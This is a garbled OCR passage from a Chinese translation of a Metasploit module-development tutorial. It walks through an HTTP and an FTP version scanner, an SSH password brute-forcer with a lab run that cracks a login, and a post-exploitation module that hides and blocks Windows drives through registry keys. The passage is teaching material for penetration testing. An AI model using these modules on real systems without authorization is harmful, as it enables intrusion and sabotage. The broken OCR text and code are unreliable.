connect 方法 ， 这 个 方法 会 与 目标 服务 器 建立 一 个 HTTP 类 型 的 连接 。 
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在 接 下 来 的 语句 中 定义 了 一 个 名 为 res 的 变量 来 存储 响应 。 我 们 将 要 使 月 





H/core/exploit/http/client.rb 





文件 中 的 send, raw request 方法 , 并 将 这 个 方法 的 参数 URI 的 值 设 置 为 /, 参数 method 的 值 设 置 
为 GET。 





# 


* 


else 
actual timeout = 
end 


begin 
c= 
r= 


connect (opts) 
c.request_raw (opts) 


rescue 
nil 
end 
end 


: :Errno: :EPIPE, 





# Connects to the server, creates a request, sends the request, reads the response 
# Passes +opts+ through directly to Rex::Proto::Http::Client#request raw. 
def send request raw(opts-(), timeout = 20) 

if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] » 0 


actual timeout = datastore['HttpClientTimeout'] 


opts[:timeout] 


c.send recv(r, actual timeout) 
::Timeout::Error 


|| timeout 





这 个 方法 将 会 帮助 你 连接 到 目标 服务 右 ， 创 建 一 个 请 求 ， 发 送 这 个 请 求 ， 接 收 响应 ， 


应 保存 到 变量 res 中 。 
目录 /rex/proto/http/ 中 的 client.rb 文件 中 的 所 有 参数 都 经 过 检查 之 后 , 通过 这 个 方法 可 将 其 传递 给 方 








许 将 这 个 响 





法 request_raw。 有 很 多 可 以 在 参数 列表 中 设置 的 参数 ， 来 看 看 它们 分 别 是 什么 。 











+ 
# Create an arbitrary HTTP request 
+ 
# @param opts [Hash] 
# @option opts 'agent' String 
# @option opts 'connection' String 
# @option opts 'cookie' String 
# @option opts 'data' String 
# @option opts 'encode' Bool] 
# @option opts 'headers' Hash] 
# @option opts 'method' String 
# @option opts 'proto' String 
# Goption opts 'query' String 
# Goption opts 'raw headers' Hash] 
# Goption opts 'uri' String 
# Goption opts 'version' String 
# Goption opts 'vhost' String 
+ 
# @return [ClientRequest] 
def request raw(opts-(]) 
opts = self.config.merge (opts) 
opts['ss1'] = self.ssl 
opts['cgi'] = false 
opts['port'] = self.port 


req = ClientRequest.new(opts) 


end 





User-Agent header value 

Connection header value 

Cookie header value 

HTTP data (only useful with some methods, see rfc2616 

URI encode the supplied URI, default: false 

HTTP headers, e.g. «code»( "X-MyHeader" => "value" j«/code» 

HTTP method to use in the request, not limited to standard methods 
protocol, default: HTTP 
raw query string 

HTTP headers 

the URI to request 
version of the protocol, 
Host header value 


default: 1.1 








res 是 一 个 用 来 存储 结果 的 变量 。 





下 一 条 语句 将 会 运行 /lib/msf/core/exploit/http/client.rb 文件 中 的 





http fingerprint 方法 , 分 析 fp 变量 中 的 数据 。 该 方法 将 记录 和 过 滤 信 息 ， 如 Set-cookie, 
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Powered-by 等 。 这 个 方法 需要 一 个 HTTP 响应 的 数据 包 进 行 运算 。 因 此 ， 我 们 将 会 把 收 到 的 响应 作 

为 一 个 参数 赋值 给 res， 这 意味 着 将 根据 之 前 发 送 请 求 的 响应 数据 进行 特征 匹配 工作 。 然 而 ， 如 果 这 

个 参数 没有 指定 ， 这 些 步 又 将 会 重新 执行 以 获得 需要 的 数据 。 下 一 条 语句 用 来 打印 输出 一 个 包含 了 诸 

如 IP 地址 、 端 口 和 服务 名 等 详细 信息 的 消息 , 不 过 只 有 当 fp 的 值 被 设置 为 真 的 时 候 ， 这 条 语句 才 会 EJ 
HÍT. PAZ report service 实现 了 将 信息 存储 到 数据 库 的 功能 ,， 它 会 保存 目标 的 IP 地址 、 端 口号 、 

服务 类 型 (HITP 或 者 HTTPS， 基 于 服务 ) 以 及 服务 信息 。 最 后 一 行 的 rescue : :Timeout : : Error, 

: :Errno: :EBPIPE， 会 在 模块 超时 的 情况 下 处 理 程序 的 异常 。 


现在 ， 让 我 们 来 运行 这 个 模块 ， 看 看 会 输出 什么 。 

































































msf > use auxiliary/scanner/http/http version 

msf auxiliary(http version) » set RHOSTS 192.168.174.132 
RHOSTS => 192.168.174.132 

msf auxiliary(http version) > run 


192.168.174.132:80 Apache/2.4.7 (Ubuntu) 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf auxiliary(http version) > services 


Services 


192.168.174.132 80 tcp http open Apache/2.4.7 (Ubuntu) 
msf auxiliary(http_version) > run 
[*] Scanned 1 of 1 hosts (100% complete) 


[*] Auxiliary module execution completed 
msf auxiliary(http_version) > 

















现在 我 们 已 经 看 到 了 一 个 模块 是 如 何 工 作 的 。 可 以 看 到 ， 当 这 个 程序 成 功 识别 目标 应 用 程序 的 指 
纹 信息 之 后 ， 就 会 将 其 显示 在 控制 台 上 并 保存 到 数据 库 中 。 另 外 ， 如 果 操 作 超 时 ， 这 个 模块 并 不 会 天 
溃 ， 而 是 会 得 到 恰当 的 处 理 。 让 我 们 在 此 基础 上 更 上 一 层 楼 ， 开 始 编写 自 定义 模块 。 














2.2.4 编写 一 个 自 定义 FTP 扫描 程序 模块 


下 面 来 尝试 开发 一 个 简单 的 模块 。 我 们 将 开发 一 个 简单 的 FTP 服务 识别 模块 , 并 了 解 它 的 工作 原 
理 。 接 下 来 查看 FTP 模块 的 代码 : 


class MetasploitModule < Msf::Auxiliary 
include Msf::Exploit::Remote::Ftp 
include Msf::Auxiliary::Scanner 
include Msf::Auxiliary::Report 
def initialize 








super( 
'Name' => 'FTP Version Scanner Customized Module', 
'Description' -» 'Detect FTP Version from the Target', 
'Author' -» 'Nipun Jaswal', 


'License' » MSF LICENSE 
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register options( 
[ 
Opt: :RPORT (21 


1) 


end 








我 们 的 代码 从 定义 需要 建立 的 Metasploit 模块 开始 。 这 里 创建 的 是 一 个 辅助 类 型 的 模块 , 该 模块 








与 之 前 介绍 的 那个 模块 一 样 。 下 一 步 ， 定 义 我 们 需要 包含 在 核心 库 之 中 的 库 文件 。 





引入 语句 位 E 


Hx 





Msf:Exploit::Remote::Ftp  /lib/msf/core/exploit/ftp.rb 包含 了 所 有 FTP 操作 相关 的 方法 ,比如 





建立 FTP 连接 、FTP 服务 登录 、 发 送 
FTP 命令 等 





Msf::Auxiliary::Scanner /lib/msf/core/auxiliary/scanner.rb 包含 了 各 种 扫描 模块 要 使 用 的 国 数 , 提 











供 了 很 多 方法 , 例如 模块 运行 、 初 始 化 
以 及 进度 扫描 等 




















Msf::Auxiliary::Report /lib/msf/core/auxiliary/report.rb 包含 了 所 有 报告 函数 , 这 些 函 数 可 以 将 


正在 运行 的 模块 中 的 数据 存储 到 数据 
库 














Be POR, 使 用 initialize 方法 定义 这 个 模块 的 属性 和 信息 ,例如 描述 、 作 者 姓名 、 许 可 等 。 也 
定义 了 该 模块 运行 所 需要 的 选项 。 例 如 ， 这 里 我 们 将 RPORT 的 值 设置 为 21， 这 是 FTP 的 默认 端口 。 














接着 我 们 查看 模块 后 面 的 部 分 。 


def run host(target host) 
connect(true, false) 
if (banner) 

















print status("t£(rhost) is running #{banner}") 











report service(:host => rhost, :port -» rport, :name -» "ftp", :info => 
banner) 
end 
disconnect 
end 
end 
库 和 函数 
接 下 来 看 一 些 库 文件 中 的 函数 ， 其 用 途 如 下 表 所 示 。 
A A E x 件 用 途 
run host /lib/msf/core/auxiliary/scanner.rb 对 每 台 主 机 运行 一 次 的 主 方法 
connect /lib/msf/core/exploit/ftp.rb 负责 与 主机 建立 一 个 连接 并 抓 取 banner, 然后 
自动 将 这 个 banner 保存 到 变量 
report, service /lib/msf/core/auxiliary/report.rb 专门 用 于 将 服务 和 相关 细节 添加 到 数据 库 中 





我 们 定义 了 run_host 方法 ， 它 将 作为 程序 的 3 























方法 ; 而 connect 函数 用 来 初始 化 一 个 连接 到 





目标 的 进程 。 我 们 需要 向 connect 函数 提供 两 个 参数 : true 和 falses Z% true 定义 了 全 局 参数 
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的 使 用 ， 而 false 定义 了 关闭 模块 的 详细 功能 。 函 数 


connect 的 优点 在 于 它 能 自动 化 连接 目标 ， 以 








及 自动 化 地 将 FTP 服务 的 标识 保存 到 名 为 banner 的 参数 中 ， 如 下 面 的 屏幕 截图 所 示 。 





# 

# This method establishes an FTP connect 

# the 'rhost' and 'rport' methods. After 

# message is read in and stored in the 

# 

def connect (global = true, verbose = nil 
verbose ||= datastore['FTPDEBUG'] 
verbose ||= datastore[ VERBOSE'] 


print status("Connecting to FTP server 
fd = super (global) 


# Wait for a banner to arrive... 
self.banner = recv ftp resp(fd) 


'banner' 


ion to host and port specified by 
connecting, the banner 
attribute. 





) 


.") if verbose 














print status("Connected to target FTP server.") if verbose 
# Return the file descriptor to the caller 
fd 
end 
个 结果 保存 到 了 banner 属性 中 ， 因 此 只 需 在 最 后 打印 输出 这 个 banner Ba. BE FREH K 





数 report_service, 将 扫描 数据 保存 在 数据 库 中 以 


auxiliary 库 中 的 report.rb 文件 中 ，report_service HR 





供 之 后 使 用 或 者 生成 高 级 报告 
数 的 代码 如 下 图 所 示 。 


这 个 函数 位 于 








# 
# Report detection of 
# 
def report service(op 
return if not db 
opts 1 
:Workspace => m 
:task => mytask 
].merge(opts) 
framework.db.report 
end 


def report note(opts- 
return if not db 
opts 1 
:Workspace => m 
:task -» mytask 
).merge(opts) 


end 





 service(opts) 


framework.db.report | 


a service 


ts={}) 


yworkspace, 


{}) 


yworkspace, 


note(opts) 








向 report, service 方法 提供 的 参数 都 通过 另 一 





个 方法 framework.db.report service 保 


存 到 了 数据 库 中 ， 这 个 方法 位 于 /lib/msfrcore/db managerservice.rb。 当 完成 了 所 有 必需 的 操作 之 后 ， 




















就 可 以 切断 和 目标 之 间 的 连接 了 。 
这 是 一 个 简单 的 模块 ， 建 议 你 现在 尝试 编写 一 些 简 


前 单 的 扫描 程序 和 一 些 类 似 的 模块 。 


66 第 2 章 打造 定制 化 的 Metasploit 渗透 测试 框架 





e 使 用 msftidy 


在 使 用 msftidy 运行 这 个 模块 之 前 ， 要 先 检查 一 下 这 些 刚刚 开发 的 模块 的 语法 是 否 正确 。 为 此 ， 
可 以 使 用 Metasploit 中 名 为 msftidy 的 内 置 工具 ， 如 下 图 所 示 。 
































root@kali:~/Desktop/MyModules/modules/auxiliary/scanne 
r/masteringmetasploit# msftidy my_ftp.rb 

my ftp.rb:20 - [GUME] Spaces at EOL 

rootékali: -/Desktop/MyModules/modules/auxiliary/scanne 
r/masteringmetasploit& Bj 


我 们 得 到 了 一 条 警告 消息 ， 即 在 第 20 行 的 末尾 存在 一 些 多 余 的 空格 。 因 此 删 掉 代 码 中 那些 无 用 
的 空格 , 然后 重新 运行 msftidy。 此 时 不 再 有 错误 提示 了 , 这 意味 着 这 个 模块 在 语法 上 不 存在 错误 了 。 
好 了 ， 现 在 来 运行 这 个 模块 并 查看 我 们 收集 到 的 信息 。 


msf > use auxiliary/scanner/masteringmetasploit/my ftp 


msf auxiliary(my ftp) > show options 























Module options (auxiliary/scanner/masteringmetasploit/my ftp): 


Name Current Setting Required Description 

FTPPASS mozillaGexample.com no The password for the specified 
username 

FTPUSER anonymous no The username to authenticate a| 

RHOSTS yes The target address range or CI| 
DR identifier 

RPORT 21 yes The target port (TCP) 

THREADS 1 yes The number of concurrent threa| 
ds 


msf auxiliary(my ftp) > set RHOSTS 192.168.174.130 
RHOSTS -» 192.168.174.130 
msf auxiliary(my ftp) > run 


[*] 192.168.174.130:21 - 192.168.174.130 is running 220-FileZilla Serv 
er 0.9.60 beta 

220-written by Tim Kosse (tim.kosseQfilezilla-project.org) 

220 Please visit https://filezilla-project.org/ 


[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 
msf auxiliary(my ftp) » services 





host port proto name state info 


192.168.174.130 21 tcp ftp open 220-FileZilla Server 0.9.60 be 
ta 

220-written by Tim Kosse (tim.kosseQfilezilla-project.org) 

220 Please visit https://filezilla-project.org/ 


可 以 看 到 ， 这 个 模块 运行 得 非常 顺利 。 它 获得 了 目标 服务 器 在 21 号 端口 上 运行 的 服务 的 banner, 
即 220-FileZilla Server 0.9.60 beta。 上 一 个 模块 中 的 函数 report_service 将 数据 保存 到 服务 字段 ， 
我 们 可 以 使 用 services 命令 来 查看 这 个 字段 ， 如 上 图 所 示 。 








3 更 多 有 关 Metasploit 项目 对 模块 的 支持 情况 ,请 访问 https://github.com/rapid7/metasploit- 


framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements。 
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2.2.5 编写 一 个 自 定义 的 SSH 认证 暴力 破解 器 


为 了 查 出 网 络 中 存在 的 那些 弱 口 令 , 需要 编写 一 个 认证 暴力 破解 涡 。 这 些 测试 不 仅仅 能 测试 应 用 

程序 中 的 弱 口 令 ， 还 可 以 确保 准确 的 授权 和 对 访问 这 些 测试 使 攻击 者 在 尝试 了 一 些 随机 猜测 

的 暴力 攻击 之 后 会 被 系统 拒绝 访问 ， 从 而 确保 攻击 者 不 能 简单 地 绕 过 安全 模式 。 E 
接 下 来 编写 一 个 用 于 检测 SSH 服务 认证 是 否 安全 的 模块 , 你 将 会 看 到 使 用 Metasploit 来 设计 一 个 

这 样 的 模块 是 多 么 简单 。 先 来 查看 这 个 模块 代码 的 一 部 分 : 


require 'metasploit/framework/credential_ collection' 
require 'metasploit/framework/login scanner/ssh' 

































































class MetasploitModule « Msf::Auxiliary 
include Msf::Auxiliary::Scanner 
include Msf::Auxiliary::Report 


include Msf::Auxiliary::AuthBrute 


def initialize 


super( 
'Name' -» 'SSH Scanner', 
'Description' => %q{ 
My Module. 
) 
'Author' -» 'Nipun Jaswal', 
'License' -» MSF LICENSE 


) 


register options( 
[ 
Opt : : RPORT (22) 
], self.class) 
end 


在 前 面 的 示例 中 ， 我 们 已 经 看 到 了 引入 Mst::auxiliary::Scanner 和 Msf::Auxiliary:: 
Report 的 重要 性 。 下 面 给 出 了 另 一 个 引入 的 库 文 件 及 其 用 途 。 


引入 语句 路 径 用 途 
Msf::Auxiliary::AuthBrute /lib/msf/core/auxiliary/auth_brute.rb 提供 了 必要 的 暴力 破解 机 制 和 功 
能 ， 例 如 提供 了 单独 的 登录 用 户 
名 和 密码 表 、 生 词 表 、 空 密码 等 
选项 





















































前 面 的 代码 引入 了 两 个 库 文件 ,分 别 是 metasploit/framework/login scanner/ssh 和 metasploit/framework/ 
credential collection; metasploit/framework/login scanner/ssh 包含 了 SSH 登录 扫描 库 , 利用 这 个 库 可 以 
避免 所 有 的 手动 操作 ， 它 还 提供 了 SSH 扫描 的 基础 API metasploit/framework/credential_collection 帮 
助 我 们 通过 使 用 datastore 中 的 用 户 输入 ,创建 复 合 的 登录 凭证 。 接 下 来 ， 我 们 定义 了 模块 的 类 型 。 


在 initialize 部 分 ， 我 们 为 这 个 模块 定义 了 基本 信息 。 来 看 下 面 的 代码 : 
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def run host(ip) 

cred collection - Metasploit::Framework::CredentialCollection.new( 
blank passwords: datastore['BLANK PASSWORDS'], 
pass file: datastore['PASS FILE'], 
password: datastore['PASSWORD'], 
user file: datastore['USER FILE'], 
userpass file: datastore['USERPASS FILE'], 
username: datastore['USERNAME'], 
user as pass: datastore['USER AS PASS'], 

) 


Scanner - Metasploit::Framework::LoginScanner::SSH.new( 
host: ip, 
port: datastore['RPORT'], 
cred details: cred collection, 
proxies: datastore['Proxies'], 
stop on success: datastore['STOP ON SUCCESS'], 
bruteforce speed: datastore['BRUTEFORCE SPEED'], 
connection timeout: datastore['SSH TIMEOUT'], 
framework: framework, 
framework module: self, 


) 


上 面 的 代码 中 有 两 个 主要 的 对 象 ， 分 别 是 cred collection 和 scanner。 有 一 点 必须 要 注意 , 在 
登录 到 SSH 服务 时 并 不 需要 进行 任何 手动 操作 ， 登 录 扫描 器 会 完成 所 有 的 工作 。 因 此 ，cred_collection 
仅仅 实现 了 按照 数据 存储 选项 来 设置 登录 赁 证。credqentialcollection 类 的 优势 在 于 ， 它 既 可 以 在 
一 次 扫描 中 同时 执行 单一 的 用 户 名 /密码 组 合 、 生 词 表 、 空 白 密码 等 操作 ， 也 可 以 一 次 只 执行 一 种 操作 。 


所 有 的 登录 扫描 模块 都 需要 使 用 credential 对 象 完成 登录 操作 。 上 面 代码 中 定义 的 scanner 对 象 
完成 了 对 一 个 SSH 类 对 象 的 初始 化 。 这 个 对 象 中 存储 了 目标 的 地 址 、 端口 、 使 用 cregdentialcollection 
类 产生 的 登录 凭证 和 其 他 信息 ， tr B. stop on success WE ( 如 果 为 真 ， 扫 描 将 会 在 获 
取 到 正确 的 登录 凭证 之 后 停止 )、 暴 力 破解 的 速度 以 及 登录 超时 的 值 。 


到 此 为 止 ， 我 们 已 经 创建 了 cred collection 和 scanner 两 个 对 象 。creq_collection 对 象 会 
基于 用 户 的 输入 产生 登录 凭证 ， scanner 对 象 会 使 用 这 些 登 录 赁 证 去 扫描 目标 。 接 下 来 需要 定义 一 个 
机 制 ， 这 个 机 制 用 来 确定 在 对 目标 测试 时 是 使 用 生词 表 中 的 所 有 登录 凭证 ,还 是 将 这 些 登 录 赁 证 作为 
参数 进行 扩展 。 


在 之 前 的 示例 中 , 我 们 已 经 见 过 了 run host 的 用 法 。 接 下 来 看 看 在 代码 中 可 以 使 用 的 各 种 库 文 
件 的 其 他 函数 。 

























































































































































































A 数 E x ft A R 
create_credential () /lib/msf/core/auxiliary/report.rb 从 result 对 象 中 得 到 登录 凭证 数据 
create credential login()  /lib/msf/core/auxiliary/report.rb 从 result 对 象 中 创建 登录 凭证 , 利用 

这 个 凭证 可 以 登录 特定 的 服务 
invalidate login /lib/msf/core/auxiliary/report.rb 用 来 标记 一 些 对 目标 服务 无 效 的 登录 


凭证 


22 开发 自 定义 模块 ”69 





下 面 给 出 了 实现 过 程 : 


Scanner.scan! do |result| 
credential data - result.to h 
credential data.merge!( 
module fullname: self.fullname, 
workspace id: myworkspace id 





if result.success? 
credential, core = create credential(credential, data) 
credential data[:core] - credential core 
create credential login(credential data) 
print good "#{ip} - LOGIN SUCCESSFUL: $(result.credential)" 
else 
invalidate login(credential data) 
print status "#{ip} - LOGIN FAILED: &(result.credential) 
(ffresult.status): #{result.proof})" 
end 
end 
end 
end 


使 用 .scan 可 以 实现 扫描 的 初始 化 ， 它 将 完成 所 有 的 登录 尝试 ， 这 表示 我 们 无 须 指 定 其 他 机 制 。 
.scan 指令 就 相当 于 Ruby 中 的 each 循环 语句 。 

下 一 条 语句 将 结果 保存 到 了 result HAF, HEH co. n 方法 对 这 个 结果 进行 处 理 后 分 配给 变 
量 credential data, to. h 方法 的 作用 是 将 数据 转换 成 散 列 格式 。 下 一 行将 模块 的 名 字 和 工作 区 id 
合并 到 credential data 变量 中 ,再 下 一 行 在 if-else 语句 中 使 用 result 对 象 的 .success 变量 
作为 判断 条 件 , 这 个 变量 表示 对 目标 的 登录 是 否 成 功 。 如果 result .success? 的 值 为 true, 就 认为 
这 个 登录 凭证 是 正确 的 ， 并 将 其 保存 到 数据 库 中 ; 不 过 如 果 这 个 条 件 不 满足 要 求 ， 就 将 这 个 登录 数据 
变量 传递 给 invalidate login 方法 ， 表 示 这 次 登录 失败 了 。 

我 建议 在 使 用 本 章 以 及 其 后 的 所 有 模块 前 ， 先 使 用 msftidy 对 它们 进行 一 致 性 检查 。 下 面 尝试 
运行 这 些 模块 。 
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msf > use auxiliary/scanner/masteringmetasploit/my ssh 
msf auxiliary(my ssh) > set USER FILE /root/user.lst 

R FILE => /root/user.lst 

msf auxiliary(my ssh) > set PASS FILE /usr/share/john/password.lst 
PASS FILlE => /usr/share/john/password.lst 

msf auxiliary(my ssh) » set STOP ON SUCCESS true 
STOP ON SUCCESS -» true 

msf auxiliary(my ssh) » set RHOSTS 192.168.174.129 
RHOSTS -» 192.168.174.129 

msf auxiliary(my ssh) > set THREADS 10 

THREADS -» 10 

msf auxiliary(my ssh) » run 


[*] 192.168.174.129 - LOGIN FAILED: claire:merlin (Unable to Connect: execution expired) 
[*] 192.168.174.129 - LOGIN FAILED: claire:newyork (Incorrect: ) 

[*] 192.168.174.129 - LOGIN FAILED: claire:soccer (Incorrect: ) 

[*] 192.168.174.129 - LOGIN FAILED: claire:thomas (Incorrect: ) 

[*] 192.168.174.129 - LOGIN FAILED: claire:wizard (Incorrect: ) 

192.168.174.129 - LOGIN SUCCESSFUL: claire:18101988 

[*] Scanned 1 of 1 hosts (100* complete) 

[*] Auxiliary module execution completed 

msf auxiliary(my ssh) > J 
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通过 使 用 用 户 名 claire 和 密码 18101988， 我 们 已 经 成 功 登 录 到 了 目标 服务 。 接 下 来 使 用 creas 








命令 来 查看 保存 到 数据 库 中 的 登录 凭证 。 





msf auxiliary(my ssh) > creds 
Credentials 


host service 


origin 


public private 


realm private type 


Password 























现在 可 以 看 到 ， 所 有 的 登录 细节 都 已 经 保存 到 了 数据 库 中 。 利 











击 或 者 生成 渗透 报告 。 

















换个 角度 来 看 这 个 过 程 
如 果 你 对 前 面 的 模块 感到 十 分 困惑 ， 现 在 就 来 一 步 步 地 了 解 它 。 











(我 们 已 经 创建 好 了 一 个 credentialcollection 对 象 , 它 将 处 理 所 有 类 型 的 











和 赁 证。 这 表明 我 们 提供 的 用 户 名 和 密码 将 会 被 该 对 象 认 为 是 用 户 任 证。 不 过 如 果 


~ 





























PASS FILE 作为 字典 ， 这 个 对 象 就 会 将 字典 
个 组 合作 为 一 个 用 户 凭证 。 


的 每 一 个 用 











j 这 些 信 息 ， 可 以 实现 进一步 的 攻 








日 户 输入 和 用 户 











使 用 





USER, FILE 和 








户 名 和 每 一 个 密码 进行 一 次 组 合 ， 并 将 这 


(2) 为 SSH 服务 创建 了 一 个 scanner HR, 这 个 对 象 将 会 删除 所 有 的 手动 输入 命令 , 然后 依次 测 

















试 我 们 提供 的 所 有 上 








户 名 /密码 组 合 。 











(3) 使 用 .scan 方法 运行 scanner， 这 样 就 可 以 开始 对 目标 的 用 户 凭 证 进行 暴力 破解 。 



































(4) .scan 方法 将 会 依次 使 用 所 有 用 户 赁 证 党 试 登录 。 然 后 根据 尝试 结 曙 





























函数 打印 输出 并 将 


2.2.0 ”编写 一 个 让 硬盘 失效 的 后 渗透 模块 











,或 者 使 用 print good 
其 保存 到 数据 库 中 ， 或 者 使 用 print_status 国 数 打印 但 不 保存 到 数据 库 。 


我 们 已 经 了 解 了 创建 模块 的 基础 ， 现 在 可 以 更 进一步 来 创建 一 个 后 渗透 模块 了 。 要 牢记 ， 只 有 在 





成 功 地 渗透 一 个 目标 以 后 ， 才 可 以 运行 后 渗透 模块 。 
现在 就 从 一 个 让 硬盘 失效 的 简单 程序 开始 
程序 。 该 程序 代码 如 下 : 


require 





"rex" 

require 'msf/core/post/windows/registry' 

class MetasploitModule « Msf::Post 
include Msf::Post::Windows::Registry 
def initialize 





一 个 可 以 禁用 Windows 7 操作 系统 上 的 指定 硬盘 的 


super( 
'Name' -» 'Drive Disabler', 
'Description' -» 'This Modules Hides and Restrict Access to a 
Drive', 
'License' -» MSF LICENSE, 
'Author' -» 'Nipun Jaswal' 


) 
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register options( 
[ 
OptString.new('DriveName', [ true, 'Please SET the Drive Letter' ]) 
], self.class) 
end 


这 次 的 开始 方式 与 以 前 的 模块 一 样 。 我 们 将 这 个 后 渗透 模块 所 需要 的 基础 库 文件 引入 到 了 代码 
中 。 通 过 下 表 查 看 新 引入 的 库 以 及 用 途 。 











引入 语句 路 径 用 途 
Msf::Post::Windows::Registry lib/msf/core/post/windows/registry.rb Ruby 的 模块 混入 技术 使 我 们 
有 具有 操纵 注册 表 的 能 





接 下 来 将 模块 的 类 型 定义 为 Pest， 表 明 这 是 一 个 后 渗透 类 型 的 模块 。 我 们 在 initialize 方法 
中 将 模块 的 必要 信息 与 代码 定义 在 一 起 , 使 用 register options 定义 模块 中 要 使 用 的 自 定 义 选 项 ， 
并 且 使 用 optstring.nevw 将 DriveName 定义 为 字符 串 类 型 。 要 定义 一 个 新 选项 ， 需 要 required 
和 description 两 个 参数 。 这 里 需要 将 required 的 值 设 置 为 true， 因 为 我 们 需要 一 个 盘 符 来 启 
动 隐藏 和 禁用 的 进程 。 将 这 个 值 设 置 为 true 之 后 ， 除 非 将 一 个 值 分 配给 这 个 模块 ， 否 则 这 个 模块 将 
不 会 启动 。 接 下 来 ， 我 们 定义 了 新 添加 的 DriveName 选项 的 描述 


在 讲解 后 面 的 代码 之 前 ， 先 来 看 看 这 个 模块 中 将 要 使 用 到 的 重要 函数 。 






























































BR 2 E x ft 用 途 
Meterpreter registry. key. exist lib/msf/core/post/windows/registry.rb 检查 在 注册 表 中 是 否 存 
在 一 个 指定 的 键 
registry  createkey lib/msf/core/post/windows/registry.rb 创建 一 个 新 的 广 册 表 键 
Meterpreter registry setvaldata lib/msf/core/post/windows/registry.rb 创建 一 个 新 的 注册 表 值 








接着 来 查看 这 个 模块 的 剩余 部 分 : 


def run 
drive int - drive string(datastore['DriveName']) 
keyl1-"HKLMNNSoftwareNMMicrosoftNNWindowsNNCurrentVersionNMPolicies NNExplorer" 


exists - Meterpreter registry key exist?(keyl) 

if not exists 

print error("Key Doesn't Exist, Creating Key!") 

registry createkey (key1) 

print good("Hiding Drive") 

eterpreter registry setvaldata(key1,'NoDrives',drive int.to s,'REG DWORD', 
REGISTRY VIEW. NATIVE) 

print good("Restricting Access to the Drive") 

eterpreter registry setvaldata(key1,'NoViewOnDrives',drive int.to s,'REG D 
WORD',REGISTRY VIEW NATIVE) 

else 

print good("Key Exist, Skipping and Creating Values") 

print good("Hiding Drive") 

eterpreter registry setvaldata(key1,'NoDrives',drive int.to s,'REG DWORD', 
REGISTRY VIEW. NATIVE) 
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print good("Restricting Access to the Drive") 
Meterpreter registry setvaldata(keyl,'NoViewOnDrives 
WORD',REGISTRY VIEW NATIVE) 

end 

print good("Disabled $s(datastore['DriveName']) Drive") 
end 


',drive int.to s,'REG D 














一 般 可 以 使 用 run 方法 来 运行 后 渗透 模块 。 所 以 我 们 来 定义 run 方法 ， 在 这 个 run 方法 中 将 变 
量 DriveName 发 送 给 drive string 方法 以 获得 盘 符 对 应 的 数值 。 

创建 一 个 名 为 key1 的 变量 ， 然 后 将 注册 表 的 位 置 保存 在 这 个 变量 中 。 这 里 要 使 月 
registry, key exist 方法 来 检查 在 系统 中 是 否 已 经 存在 该 注册 表 键 。 

















H meterpreter 




















如 果 这 个 键 已 经 存在 ,变量 exists 就 会 被 赋值 为 crue, 否则 就 会 被 赋值 为 false。 如 果 exists 
的 值 为 false, WEH registry createkey (keyl) 来 创建 一 个 注册 表 的 键 ， 然 后 再 创建 注册 表 的 
值 ; 如 果 这 个 值 为 true， 则 只 需要 创建 它 的 值 即 可 。 

为 了 实现 对 盘 符 的 隐藏 和 访问 限制 ,需要 创建 两 个 注册 表 值 , 它 们 分 别 为 NoDrives fll Noviewonprive, 
值 为 10 进 制 或 者 16 进 制 表示 的 盘 符 ， 定 义 的 类 型 为 DWORD。 
因为 我 们 使 用 的 是 Meterpreter 命令 行 , 所 以 可 以 使 用 Meterpreter registry. setvaldata 方法 
实现 这 两 个 注册 表 值 的 设 定 。 我们 需要 向 函数 Meterpreter_registry_setvaldata 提供 5 个 参数 
以 保证 它 能 够 正常 运行 ， 这 些 参数 包括 : 1 个 字符 串 类 型 的 注册 表 键 路 径 、1 个 字符 串 类 型 的 注册 表 
值 、1 个 10 进 制 数字 表示 的 硬盘 盘 符 ( 这 个 值 也 要 转换 成 对 应 的 字符 串 类 型 )、1 个 字符 串 类 型 的 注册 
表 值 类 型 和 1 个 整数 类 型 的 视图 值 (初始 为 0， 设 置 为 1 表示 32 位 视图 ， 设置 为 2 表示 64 位 视图 )。 



















































































下 面 列举 了 一 个 使 用 Meterpreter_registry_setvaldata 的 示例 : 


Meterpreter_registry_setvaldata (key1,'NoViewOnDrives',drive_int.to_s, 'REG_D 
WORD',REGISTRY VIEW NATIVE) 








在 这 段 代 码 中 ,我 们 将 位 置 设置 为 key1， 值 设置 为 NoviewonDrives，10 进 制 的 16 表示 了 D 盘 ， 
EG_DWORD 作为 注册 表 的 类 型 ，REGISTRY_VIEW_NATIVE 表示 值 为 0。 


n 




















"B 




















置 为 2。 这 两 个 值 可 以 使 用 REGISTRY VIEW 32 BIT 和 REGISTRY VIEW 64 BIT 
来 代替 。 
你 可 能 会 很 奇怪 : 为 什么 我 们 使 用 16 ENAIT E 的 掩 码 ?下面 来 看 看 这 个 掩 码 的 计算 过 程 。 
对 于 一 个 给 出 的 盘 符 掩 码 的 计算 ,可 以 使 用 公式 2^([ 驱 动 器 字符 序列 号 ]-1)。 比 如 我 们 需要 禁 月 
便 盘 E， 而 卫 是 字母 表 中 的 第 5 个 字符 ， 因 此 计算 禁用 卫 盘 的 准确 掩 码 的 过 程 就 应 如 下 所 示 。 
2^(-D=2^4= 16 


禁用 王 盘 的 掩 码 值 为 16。 在 上 面 的 代码 中 ,我 们 在 arive_string 方法 中 使 用 case 分 支 语句 
对 一 些 值 实现 了 硬 编码 。 下 面 给 出 实现 过 程 : 








要 访问 32 位 的 注册 表 ， 需 要 将 视图 参数 设置 为 1; 要 访问 64 位 的 注册 表 ， 则 需要 设 
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def drive string(drive) 
case drive 

when "A" 

return 1 


when "B" 
return 2 





when "C" 
return 4 


when "Dp" 
return 8 





when "E" 
return 16 
end 

end 

end 


M Ei BS RB RTEUE B, EHEIRHAEON EIC, AA PROC R [RPSL BUE RUPEE, MERRE 
看 一 下 目标 系统 上 有 多少 个 硬盘。 











=| » Computer ， v |*4 || Search Computer p 
Be > Comptes e [e [Seren co 

















Organize * System properties — » s- nue 
^ Favorites 4 Hard Disk Drives (2) 

lil Desktop Local Disk (C) 

jy Downloads -> MN 

0. Recent Places WR 29.6 GB free of 370 GB 

New Volume (E:) 

习 Libraries cx ! 
e: CORP 258GB free of 292 GB 

+} Documents 

4 Music 4 Devices with Removable Storage (1) 

Æ Pictures gà 

是 Videos 2 DVD Drive (D:) 
!& Computer 
tù Network 

—,  WIN-6FOSIRT3265 Workgroup: WORKGROUP 

A Processor: Intel(R) Core(TM) i7-4710HQ CPU @ 2... 
